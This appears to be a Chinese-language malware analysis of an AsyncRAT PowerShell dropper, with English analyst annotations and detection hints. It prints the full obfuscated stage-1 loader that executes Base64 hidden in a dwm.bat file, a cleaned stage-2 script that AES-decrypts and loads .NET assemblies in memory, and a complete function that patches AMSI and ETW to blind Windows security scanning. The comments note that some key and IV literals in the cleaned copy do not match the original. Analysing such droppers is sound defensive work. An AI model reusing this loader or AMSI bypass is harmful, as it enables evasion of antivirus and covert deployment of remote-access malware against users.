衍生物
AsyncRAT木马
VirusTotal - File - 14fc76ea31a4f4c93a2d12199de031e90c8f92be97ade17367bef06421676c70
- $uvqtjaiirypxwtd=$env:USERNAME
- $xhpvggdoyemnqyo="C:\Users\$uvqtjaiirypxwtd\dwm.bat"
# Stage-1 loader as rendered on the forum: the leading "- " on each line is list
# markup, not PowerShell. It looks for dwm.bat directly under C:\Users\<user>,
# runs whatever is hidden in that file's ':::' lines, then de-obfuscates and runs
# the embedded stage 2 below.
# Hunting notes: cmdlet and member names are split into string halves
# ('Test'+'-Path', 'Read'+'AllLines', 'FromBase64'+'String', 'Invoke'+'-Expression')
# purely to defeat static matching; a .bat in the user profile whose comment
# lines carry Base64 is the on-disk artefact to look for.
- $vlqwvtjzmwkfhsa='Test'+'-Path'
- if(&$vlqwvtjzmwkfhsa $xhpvggdoyemnqyo){
# [System.IO.File]::('Read'+'AllLines') -- static method looked up by a string-built name.
- $gofgsuqspyrhrpx=[System.IO.File]::('Read'+'AllLines')($xhpvggdoyemnqyo,[System.Text.Encoding]::UTF8)
- foreach($nsjdddgzyjohczw in $gofgsuqspyrhrpx){
# Batch-file comment lines beginning with ':::' carry the payload; the space after
# the colons is optional (' ?'). NOTE(review): the pattern literal appears truncated
# by the forum rendering -- the closing quote (and probably a '$' anchor) before
# '){' is missing.
- if($nsjdddgzyjohczw-match'^::: ?(.+)
- ){
- try{
# Base64 -> bytes -> text via [Text.Encoding]::Unicode -> Invoke-Expression.
# Only the first matching line is executed (break); any decode/exec error is
# swallowed and the loop simply moves on to the next line.
- $awvyxxhkftftbye=[System.Convert]::('FromBase64'+'String')($matches[1].Trim())
- $mrkojswdpxaohwe=[System.Text.Encoding]::('Unicode').GetString($awvyxxhkftftbye)
- &('Invoke'+'-Expression')$mrkojswdpxaohwe
- break
- }catch{}
- }
- }
- }
# Stage 2 is a single-quoted here-string with the token 'mo' inserted throughout
# (identifiers, type names and Base64 literals alike); it is not valid PowerShell
# until the -replace below strips the token. Inside it, method names are also
# reversed ('daoL'[-1..-4] -> Load, 'txeTllAdaeR'[-1..-11] -> ReadAllText).
# The forum has split the blob over two lines here; a hand-cleaned listing
# appears further down the page.
- $iaobgsajaiaxsodksusnvnnyhqybot=@'
- $bxocmo = $emonv:USmoERNAMmoE;$rxmoki = mo"C:\Umosers\mo$bxocmo\dwm.mobat";mofunctmoion fmoveer(mo$paramom_varmo){ mo $aesmo_var=mo[Systmoem.Semocuritmoy.Crymoptogrmoaphy.moAes]:mo:Creamote();mo $moaes_vmoar.Momode=[Smoystemmo.Secumority.moCryptmoograpmohy.CimopherMmoode]:mo:CBC;mo $moaes_vmoar.Pamoddingmo=[Sysmotem.Smoecurimoty.Crmoyptogmoraphymo.PaddmoingMomode]::moPKCS7mo; mo$aes_movar.Kmoey=[Smoystemmo.Convmoert]:mo:FrommoBase6mo4Strimong('xmoPx62Tmo8l/21moyh6Rcmo6gH6hmoXK4uAmoA6ySSmo0q+jzmopKpjymoSQ=')mo; mo$aes_movar.ImoV=[Symostem.moConvemort]::moFromBmoase64moStrinmog('flmoxnnhomoAXdaJmow2nm6moPLR6Qmo==');mo $modecrymoptor_movar=$moaes_vmoar.CrmoeateDmoecrypmotor()mo; mo$retumorn_vamor=$democryptmoor_vamor.TramonsformomFinamolBlocmok($pamoram_vmoar, 0mo, $pamoram_vmoar.Lemongth)mo; mo$decrmoyptormo_var.moDispomose();mo $moaes_vmoar.Dimosposemo(); mo $remoturn_movar;}mofunctmoion qmogham(mo$paramom_varmo){ mo $rgvmocjblfmoqfoijmodp=Nemow-Objmoect Smoystemmo.IO.MmoemorymoStreamom(,$pmoaram_movar);mo $mobqguzmowcfcgmonixgzmo=New-moObjecmot Sysmotem.ImoO.MemmooryStmoream;mo $mopkxjtmoyakszmoubgoimo=New-moObjecmot Sysmotem.ImoO.Commopressmoion.GmoZipStmoream(mo$rgvcmojblfqmofoijdmop, [ImoO.Commopressmoion.CmoompremossionmoMode]mo::Decmoompremoss); mo $pmokxjtymoakszumobgoi.moCopyTmoo($bqmoguzwcmofcgnimoxgz);mo $mopkxjtmoyakszmoubgoimo.Dispmoose()mo; mo$rgvcmojblfqmofoijdmop.Dismopose(mo); mo $bqgmouzwcfmocgnixmogz.Dimosposemo(); mo $bqmoguzwcmofcgnimoxgz.TmooArramoy();}mofunctmoion gmohwux(mo$paramom_varmo,$parmoam2_vmoar){ mo $xmomappamoambppmoatvw=mo[Systmoem.Remoflectmoion.Amossembmoly]::mo('daomoL'[-1mo..-4]mo -joimon '')mo([bytmoe[]]$moparammo_var)mo; mo$soyrmopekzjmoqbfovmoe=$xmmoappaamombppamotvw.EmontryPmooint;mo $mosoyrpmoekzjqmobfovemo.Invomoke($nmoull, mo$paramom2_vamor);}$mohost.moUI.RamowUI.WmoindowmoTitlemo = $rmoxki;$modvhexmoqkdebmosofetmo=[Sysmotem.ImoO.Filmoe]::(mo'txeTmollAdamoeR'[-mo1..-1mo1] -jmooin 
'mo')($rmoxki).moSplitmo([Envmoironmmoent]:mo:NewLmoine);moforeamoch ($moocvczmojgankmoludlcmo in $modvhexmoqkdebmosofetmo) { mo if mo($ocvmoczjgamonkludmolc.StmoartsWmoith('mo:: ')mo) mo{ mo $mounrrmmobkqrfmoogdlzmo=$ocvmoczjgamonkludmolc.Sumobstrimong(3)mo; mo bmoreak;mo }mo}$updmofpqgumopsonemoga=[smotringmo[]]$umonrrmbmokqrfomogdlz.moSplitmo('\')mo;$ggemopuxdimovfdzzmozm=qgmoham (mofveermo ([Comonvertmo]::FrmoomBasmoe64Stmoring(mo$updfmopqgupmosonegmoa[0])mo));$jmonbyqvmoryvlemovnca=moqghammo (fvemoer ([moConvemort]::moFromBmoase64moStrinmog($upmodfpqgmoupsonmoega[1mo])));moghwuxmo $ggemopuxdimovfdzzmozm $nmoull;gmohwux mo$jnbymoqvryvmolevncmoa (,[mostrinmog[]] mo('%*'mo));
- '@
# Strip the junk token and execute. The decoded script reads the ':: ' line of
# dwm.bat, AES-decrypts and GZip-inflates its two '\'-separated halves and loads
# the results in memory as .NET assemblies.
- $nnssyvltsafhdjxjebuxwwoqeesfaw=$iaobgsajaiaxsodksusnvnnyhqybot-replace'mo',''
- &('Invoke'+'-Expression')$nnssyvltsafhdjxjebuxwwoqeesfaw
初始设置和文件检查:
读取当前用户名 ($env:USERNAME),并构建用户目录下 dwm.bat 文件的路径 (C:\Users\<username>\dwm.bat)。
检查是否存在dwm.bat。
如果该文件存在,则以 UTF-8 编码读取 dwm.bat 的所有行。
Base64 解码和执行:
1.
在 dwm.bat 中遍历每一行。
查找以 ::: 开头的行(三个冒号后跟一个空格)。
尝试将 ::: 后面的内容按 Base64 解码,再将得到的字节按 Unicode 编码转换为字符串。
使用 Invoke-Expression 执行解码的字符串,该字符串将其作为 PowerShell 代码运行。
如果在解码或执行过程中发生错误,异常会被捕获并忽略,然后继续处理下一行。
function Invoke-E1W {
<#
.SYNOPSIS
Patches, in the memory of the current process, the functions reached through an
AMSI context obtained from amsi.dll, and optionally ntdll!EtwEventWrite. Decoy
wording ("optimization", "system maintenance", " Connected.") hides the intent.
.DESCRIPTION
Annotated for analysts. The page does not say where this stage comes from;
presumably it is one of the scripts the stage-1 loader decodes from dwm.bat.
Every Win32 name it needs (GetModuleHandle, GetProcAddress, AmsiInitialize,
VirtualProtect, EtwEventWrite, amsi.dll, kernel32.dll, ntdll.dll) is hidden as a
byte array, a string split, or a -f template, and all native calls go through
delegates built with Reflection.Emit -- no Add-Type P/Invoke block ever appears.
.PARAMETER LgD
Sets $VrbP = "Continue"; nothing reads $VrbP afterwards, so the switch is a no-op.
Note that both parameters declare Position=0.
.PARAMETER OptP
Additionally overwrites the entry of EtwEventWrite in ntdll.dll so that calls into
it return immediately (no events are written by this process).
.NOTES
Observable behaviour for detection: powershell.exe calling VirtualProtect on
amsi.dll / ntdll.dll code pages and then writing to them, a dynamic assembly
'McrA' with module 'McrM' and delegate type 'McrK', AmsiInitialize called with
app name "Scanner", and the decoy output strings at the end of the function.
#>
[CmdletBinding()]
param (
[Parameter(Mandatory=$false, Position=0)]
[switch]$LgD,
[Parameter(Mandatory=$false, Position=0)]
[switch]$OptP
)
if ($LgD) { $VrbP = "Continue" }
try {
# Get-R3Z: resolve export $SZb in module $Bbl. Uses the internal
# System.Windows.Forms.UnsafeNativeMethods wrappers for GetModuleHandle /
# GetProcAddress ($R3d, $BchN, $ZbN are set in the enclosing scope below), so no
# P/Invoke signature has to be declared. Returns the raw function address.
function Get-R3Z {
param ([string]$Bbl, [string]$SZb)
$Of3 = $R3d.GetMethod($BchN)
$Ams = $R3d.GetMethod($ZbN)
$mdH = $Of3.Invoke($null, @($Bbl))
$tmpR = New-Object IntPtr
$hR = New-Object System.Runtime.InteropServices.HandleRef($tmpR, $mdH)
$Ams.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$hR, $SZb))
}
# Get-MbS: emit a delegate type ('McrK' in dynamic assembly 'McrA') whose Invoke
# has parameter types $WzT and return type $EzT, then bind it to the raw function
# pointer $PrtA with Marshal.GetDelegateForFunctionPointer. Member names are built
# from string halves ("Curren"+"tDomain", "GetDelegate"+"ForFunctionPointer") to
# defeat static matching.
function Get-MbS {
param (
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]$PrtA,
[Parameter(Position=1, Mandatory=$true)]
[Type[]]$WzT,
[Parameter(Position=2)]
[Type]$EzT = [Void]
)
$Wlt = [AppDomain]::("Curren" + "tDomain")
$DfN = New-Object System.Reflection.AssemblyName('McrA')
$Bms = $Wlt.DefineDynamicAssembly($DfN, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$Bpl = $Bms.DefineDynamicModule('McrM', $false)
$Dbw = $Bpl.DefineType('McrK', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$Spn = $Dbw.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $WzT)
$Spn.SetImplementationFlags('Runtime, Managed')
$Hdl = $Dbw.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $EzT, $WzT)
$Hdl.SetImplementationFlags('Runtime, Managed')
$MbT = $Dbw.CreateType()
[System.Runtime.InteropServices.Marshal]::("GetDelegate" + "ForFunctionPointer")($PrtA, $MbT)
}
# WinForms is loaded only to reach its private UnsafeNativeMethods type.
Add-Type -AssemblyName System.Windows.Forms -ErrorAction Stop
$D1a = [System.Runtime.InteropServices.Marshal]
$R3d = [Windows.Forms.Form].Assembly.GetType('System.Windows.Forms.UnsafeNativeMethods')
# API names are stored as byte arrays and decoded at runtime:
# $ZbB -> "GetProcAddress", $BchB -> "GetModuleHandle".
$ZbB = [Byte[]](0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73)
$BchB = [Byte[]](0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65)
$ZbN = [System.Text.Encoding]::ASCII.GetString($ZbB)
$BchN = [System.Text.Encoding]::ASCII.GetString($BchB)
# These two MethodInfos are not used here; Get-R3Z looks them up again itself.
$Of3 = $R3d.GetMethod($BchN)
$Ams = $R3d.GetMethod($ZbN)
# $SZbB -> "AmsiInitialize", $BblB -> "amsi.dll".
$SZbB = [Byte[]](0x41,0x6D,0x73,0x69,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65)
$BblB = [Byte[]](0x61,0x6D,0x73,0x69,0x2E,0x64,0x6C,0x6C)
$Bbl = [System.Text.Encoding]::ASCII.GetString($BblB)
$SZb = [System.Text.Encoding]::ASCII.GetString($SZbB)
# $N7S = address of amsi!AmsiInitialize.
$N7S = Get-R3Z $Bbl $SZb
# Pointer size selects the 64-bit or 32-bit variant of every read/offset below.
$GrZ = $D1a::SizeOf([Type][IntPtr])
# Delegate: int AmsiInitialize(string appName, out <pointer-sized> amsiContext).
if ($GrZ -eq 8) {
$Wkb = Get-MbS $N7S @([string], [UInt64].MakeByRefType()) ([Int])
[Int64]$Eprl = 0
}
else {
$Wkb = Get-MbS $N7S @([string], [IntPtr].MakeByRefType()) ([Int])
$Eprl = 0
}
# "VirtualProtect" from "kernel32.dll", assembled with '+' and -f so neither name
# appears whole in the script.
$sSfx = 'Virt' + 'ualProtec'
$sMtd = '{0}{1}' -f $sSfx, 't'
$kBbl = "ker{0}.dll" -f "nel32"
$SAdr = Get-R3Z $kBbl $sMtd
# Delegate: bool VirtualProtect(IntPtr addr, uint size, uint newProtect, out uint oldProtect).
$EGlm = Get-MbS $SAdr @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])
# 0x80 = PAGE_EXECUTE_WRITECOPY.
$S_OBS = 0x00000080
# 6-byte stub B8 00 00 00 00 C3 = "mov eax, 0 ; ret": any function that starts
# with it returns 0 immediately without doing its real work.
$GldB = [byte[]](0xb8,0x0,0x00,0x00,0x00,0xC3)
$Sld = 0
$KstX = 0
# Obtain a genuine AMSI context (non-zero HRESULT = failure); the messages are decoys.
if ($Wkb.Invoke("Scanner", [ref]$Eprl) -ne 0) {
if ($Eprl -eq 0) { Throw "[!] No system component found." }
else { Throw "[!] Error initializing system component." }
}
# Walk pointers out of the context: ctx -> object (+16 / +8) -> start of a table
# of pointers (+64 / +36). The offsets are not explained anywhere on this page;
# presumably they match the amsi.dll context layout of a particular Windows
# build -- TODO confirm before relying on them. The loop runs until a null entry.
if ($GrZ -eq 8) {
$Bch = $D1a::ReadInt64([IntPtr]$Eprl, 16)
$Kmp = $D1a::ReadInt64([IntPtr]$Bch, 64)
}
else {
$Bch = $D1a::ReadInt32($Eprl + 8)
$Kmp = $D1a::ReadInt32($Bch + 36)
}
# For every table entry: dereference the object ($Zbt), take the function pointer
# at +24 / +12 ($Fkl -- presumably its scan routine), make the page writable,
# overwrite its first 6 bytes with the stub, verify the write byte-for-byte, then
# restore the previous protection.
while ($Kmp -ne 0) {
if ($GrZ -eq 8) {
$Zbt = $D1a::ReadInt64([IntPtr]$Kmp)
$Fkl = $D1a::ReadInt64([IntPtr]$Zbt, 24)
}
else {
$Zbt = $D1a::ReadInt32($Kmp)
$Fkl = $D1a::ReadInt32($Zbt + 12)
}
if (-not $EGlm.Invoke($Fkl, [uint32]6, $S_OBS, [ref]$Sld)) {
Throw "[!] Error changing memory settings at $Fkl"
}
try {
$D1a::Copy($GldB, 0, [IntPtr]$Fkl, 6)
}
catch {
Throw "[!] Error during optimization at $Fkl"
}
for ($i=0; $i -lt $GldB.Length; $i++) {
$Apl = $D1a::ReadByte([IntPtr]::Add($Fkl, $i))
if ($Apl -ne $GldB[$i]) { Throw "[!] Optimization failed at $Fkl" }
}
# $Sld still holds the protection returned by the first call, so this restores it.
if (-not $EGlm.Invoke($Fkl, [uint32]6, $Sld, [ref]$Sld)) {
Throw "[!] Error restoring memory settings at $Fkl"
}
# Next table slot (pointer-sized stride).
$KstX++
if ($GrZ -eq 8) {
$Kmp = $D1a::ReadInt64([IntPtr]$Bch, 64 + ($KstX * $GrZ))
}
else {
$Kmp = $D1a::ReadInt32($Bch + 36 + ($KstX * $GrZ))
}
}
# Optional ETW patch: $Knch -> "EtwEventWrite", resolved in "ntdll.dll". On x64 the
# first byte becomes C3 (ret). On x86 three bytes B8 FF 55 are written even though
# only 1 byte was unprotected; B8 alone is an incomplete "mov eax, imm32", so
# whether that branch works is not something this listing shows.
if ($OptP) {
$Knch = [Byte[]](0x45,0x74,0x77,0x45,0x76,0x65,0x6E,0x74,0x57,0x72,0x69,0x74,0x65)
$Ppr = [System.Text.Encoding]::ASCII.GetString($Knch)
$Ltr = Get-R3Z ("nt{0}.dll" -f "dll") $Ppr
if (-not $EGlm.Invoke($Ltr, 1, $S_OBS, [ref]$Sld)) {
Throw "[!] Error changing memory settings for $Ppr"
}
try {
if ($GrZ -eq 8) {
$D1a::WriteByte($Ltr, 0xC3)
}
else {
$Kks = [byte[]](0xb8,0xff,0x55)
$D1a::Copy($Kks, 0, [IntPtr]$Ltr, 3)
}
}
catch {
Throw "[!] Error during optimization of $Ppr"
}
if (-not $EGlm.Invoke($Ltr, 1, $Sld, [ref]$Sld)) {
Throw "[!] Error restoring memory settings for $Ppr"
}
# Decoy status output.
Write-Output " Connected."
}
else {
Write-Output " System maintenance completed."
}
}
# Outer catch only rethrows; all failure texts above are deliberately misleading.
catch {
Throw $_
}
}
Invoke-E1W -OptP # Entry point of this stage: runs with the ETW patch enabled (-OptP); -LgD is never passed.
2.
混淆负载:
定义一个大型混淆字符串 ($iaobgsajaiaxsodksusnvnnyhqybot),其中包含具有故意拼写错误的 PowerShell 代码(例如,重复插入 mo)。
使用 -replace 'mo','' 删除 mo 字符以生成有效的 PowerShell 代码。
使用 Invoke-Expression 执行已清理的代码。
$iaobgsajaiaxsodksusnvnnyhqybot = @'
$bxoc = $env:USERNAME;
$rxoki = "C:\Users\$bxoc\dwm.bat";
function fveer($param_var){
$aes_var = [System.Security.Cryptography.Aes]::Create();
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key = [Convert]::FromBase64String('xPx62T8l/21yh6Rc6gH6hXK4uAA6ySS0q+jzpKpySQ=');
$aes_var.IV = [Convert]::FromBase64String('floxnhoAXdaJw2n6PLR6Q==');
$decryptor_var = $aes_var.CreateDecryptor();
$return_var = $decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
$decryptor_var.Dispose();
$aes_var.Dispose();
return $return_var;
}
function qgham($param_var){
$rgvcjblfqfoijdp = New-Object System.IO.MemoryStream(,$param_var);
$bqguzwcmofcgnimoxgz = New-Object System.IO.MemoryStream;
$pkxjtakszmoubgo = New-Object System.IO.Compression.GZipStream($rgvcjblfqfoijdp, [IO.Compression.CompressionMode]::Decompress);
$pkxjtakszmoubgo.CopyTo($bqguzwcmofcgnimoxgz);
$pkxjtakszmoubgo.Dispose();
$rgvcjblfqfoijdp.Dispose();
$bqguzwcmofcgnimoxgz.Dispose();
return $bqguzwcmofcgnimoxgz.ToArray();
}
function gmohwux($param_var, $param2_var){
$xmapambpvatvw = [System.Reflection.Assembly]::Load([byte[]]$param_var);
$soyrpekzjqbfove = $xmapambpvatvw.EntryPoint;
$soyrpekzjqbfove.Invoke($null, $param2_var);
}
$host.UI.RawUI.WindowTitle = $rxoki;
$dvhexqkdebmosofet = [System.IO.File]::ReadAllText($rxoki).Split([Environment]::NewLine);
foreach ($ocvmoczjgamonkludmolc in $dvhexqkdebmosofet) {
if ($ocvmoczjgamonkludmolc.StartsWith(':: ')) {
$umrrmbkqrfogdlz = $ocvmoczjgamonkludmolc.Substring(3);
break;
}
}
$updfpqgumopsonemoga = [string[]]$umrrmbkqrfogdlz.Split('\');
$ggemopuxdimovfdzz = qgham (fveer ([Convert]::FromBase64String($updfpqgumopsonemoga[0])));
$jmonbyqvmoryvlemovnca = qgham (fveer ([Convert]::FromBase64String($updfpqgumopsonemoga[1])));
gmohwux $ggemopuxdimovfdzz $null;
gmohwux $jmonbyqvmoryvlemovnca (,[string[]]@('%*'));
'@
# The here-string above is the poster's hand-cleaned rendering of the stage-2 blob;
# it is a single-quoted literal, so nothing in it is interpolated or executed until
# the -replace / Invoke-Expression below. Leftover 'mo' fragments in names such as
# gmohwux or $bqguzwcmofcgnimoxgz are harmless because the -replace strips them.
# NOTE(review): some literals here do not match what `-replace 'mo',''` yields from
# the original obfuscated blob earlier on the page -- e.g. the AES key there ends in
# 'pKpjySQ=' (44 Base64 chars) but here in 'pKpySQ=' (43 chars, an invalid length),
# and the IV literal also differs by a character. Anyone reproducing the decryption
# for analysis should derive key and IV from the original blob, not from this copy.
# What the decoded script does:
#  - fveer:   AES-CBC / PKCS7 decrypt with the hard-coded key and IV.
#  - qgham:   GZip-inflate a byte array.
#  - gmohwux: Assembly.Load(byte[]) and invoke the EntryPoint -- in-memory .NET loading,
#             never touching disk.
#  - Sets the console title to the dwm.bat path, takes the first ':: ' line of
#    dwm.bat, splits it on '\', decrypts + inflates both halves, runs the first
#    with no arguments and the second with the argument array ('%*').
# Detection pointers: Assembly.Load over a byte[] from a PowerShell host, a console
# title equal to a .bat path under C:\Users, and a .bat whose ':: ' line carries
# '\'-separated Base64 blobs.
$nnssyvltsafhdjxjebuxwwoqeesfaw = $iaobgsajaiaxsodksusnvnnyhqybot -replace 'mo',''
&('Invoke-Expression') $nnssyvltsafhdjxjebuxwwoqeesfaw
有效载荷分析:在进行反混淆(删除 mo)后,负载将执行以下操作:
定义三个功能:
fveer:使用 AES(CBC 模式,PKCS7 填充)和硬编码密钥和 IV(均为 Base64 编码)解密输入。
qgham: 使用 GZip 解压缩输入。
ghwux:使用 [System.Reflection.Assembly]::Load 将字节数组加载为 .NET 程序集并调用其入口点。
将控制台窗口标题设置为 dwm.bat 的路径。
再次读取 dwm.bat,查找以 :: 开头的行(两个冒号和一个空格)。
将 :: 之后的内容按 \ 拆分为数组。
使用 fveer 解码和解密数组中的两个 Base64 字符串,然后使用 qgham 解压缩它们。
将第一个解压缩的结果加载为 .NET 程序集并调用其入口点。
将第二个解压缩结果作为另一个程序集调用,并传递通配符参数 (%*)。